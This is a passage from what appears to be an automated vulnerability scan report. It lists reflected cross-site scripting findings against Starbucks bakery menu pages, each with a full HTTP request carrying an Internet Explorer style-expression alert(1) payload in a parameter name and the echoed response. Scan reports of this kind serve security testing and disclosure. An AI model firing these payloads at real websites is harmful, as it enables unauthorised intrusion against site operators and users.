Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:28 GMT
Connection: close
Content-Length: 43530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cheese-danish?720d9"style="x:expression(alert(1))"e96e6a310b9=1"/>
...[SNIP]...

2.217. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-chunk-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3ae7"style="x:expression(alert(1))"1218e3ddc34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chocolate-chunk-cookie?b3ae7"style%3d"x%3aexpression(alert(1))"1218e3ddc34=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:28 GMT
Connection: close
Content-Length: 43745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie?b3ae7"style="x:expression(alert(1))"1218e3ddc34=1"/>
...[SNIP]...

2.218. http://www.starbucks.com/menu/food/bakery/chocolate-croissant [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-croissant

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec6af"style="x:expression(alert(1))"7f2ab7e4792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chocolate-croissant?ec6af"style%3d"x%3aexpression(alert(1))"7f2ab7e4792=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:24 GMT
Connection: close
Content-Length: 43723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-croissant?ec6af"style="x:expression(alert(1))"7f2ab7e4792=1"/>
...[SNIP]...

2.219. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chocolate-old-fashion-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8e17"style="x:expression(alert(1))"09e01d0c9ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style%3d"x%3aexpression(alert(1))"09e01d0c9ea=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:50:23 GMT
Connection: close
Content-Length: 44023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut?e8e17"style="x:expression(alert(1))"09e01d0c9ea=1"/>
...[SNIP]...

2.220. http://www.starbucks.com/menu/food/bakery/chonga-bagel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/chonga-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9a9de"style="x:expression(alert(1))"4d4ab94d51c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/chonga-bagel?9a9de"style%3d"x%3aexpression(alert(1))"4d4ab94d51c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:59 GMT
Connection: close
Content-Length: 44374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/chonga-bagel?9a9de"style="x:expression(alert(1))"4d4ab94d51c=1"/>
...[SNIP]...

2.221. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cinnamon-chip-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9357"style="x:expression(alert(1))"a5e7a229ce8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cinnamon-chip-scone?f9357"style%3d"x%3aexpression(alert(1))"a5e7a229ce8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:12 GMT
Connection: close
Content-Length: 44140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone?f9357"style="x:expression(alert(1))"a5e7a229ce8=1"/>
...[SNIP]...

2.222. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-orange-scone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72286"style%3d"x%3aexpression(alert(1))"197c462648b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72286"style="x:expression(alert(1))"197c462648b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cranberry-orange-scone?72286"style%3d"x%3aexpression(alert(1))"197c462648b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:41 GMT
Connection: close
Content-Length: 44023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone?72286"style="x:expression(alert(1))"197c462648b=1"/>
...[SNIP]...

2.223. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-chocolate-brownie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f0b7"style="x:expression(alert(1))"aedb089978d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-chocolate-brownie?6f0b7"style%3d"x%3aexpression(alert(1))"aedb089978d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:06 GMT
Connection: close
Content-Length: 43802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie?6f0b7"style="x:expression(alert(1))"aedb089978d=1"/>
...[SNIP]...

2.224. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-fudge-mini-doughnut

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a1f7a"style="x:expression(alert(1))"12f20aa2559 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style%3d"x%3aexpression(alert(1))"12f20aa2559=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:17 GMT
Connection: close
Content-Length: 43677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut?a1f7a"style="x:expression(alert(1))"12f20aa2559=1"/>
...[SNIP]...

2.225. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/double-iced-cinnamon-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c5ac"style="x:expression(alert(1))"518bf21ccf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style%3d"x%3aexpression(alert(1))"518bf21ccf8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:51:22 GMT
Connection: close
Content-Length: 44648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll?5c5ac"style="x:expression(alert(1))"518bf21ccf8=1"/>
...[SNIP]...

2.226. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/ginger-molasses-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed67b"style="x:expression(alert(1))"139025d5ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/ginger-molasses-cookie?ed67b"style%3d"x%3aexpression(alert(1))"139025d5ad=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:43 GMT
Connection: close
Content-Length: 43092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie?ed67b"style="x:expression(alert(1))"139025d5ad=1"/>
...[SNIP]...

2.227. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/hawaiian-bagel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c503f"style%3d"x%3aexpression(alert(1))"cd602ede713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c503f"style="x:expression(alert(1))"cd602ede713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/hawaiian-bagel?c503f"style%3d"x%3aexpression(alert(1))"cd602ede713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:53:13 GMT
Connection: close
Content-Length: 43576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/hawaiian-bagel?c503f"style="x:expression(alert(1))"cd602ede713=1"/>
...[SNIP]...

2.228. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/iced-lemon-pound-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ddfa4"style="x:expression(alert(1))"a47f474673c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/iced-lemon-pound-cake?ddfa4"style%3d"x%3aexpression(alert(1))"a47f474673c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:52:47 GMT
Connection: close
Content-Length: 44496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake?ddfa4"style="x:expression(alert(1))"a47f474673c=1"/>
...[SNIP]...

2.229. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/low-fat-raspberry-sunshine-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ef2aa"style="x:expression(alert(1))"36428682d89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style%3d"x%3aexpression(alert(1))"36428682d89=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:54:01 GMT
Connection: close
Content-Length: 43853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin?ef2aa"style="x:expression(alert(1))"36428682d89=1"/>
...[SNIP]...

2.230. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/mallorca-sweet-bread

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea7f1"style="x:expression(alert(1))"a7c7d383e8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/mallorca-sweet-bread?ea7f1"style%3d"x%3aexpression(alert(1))"a7c7d383e8a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
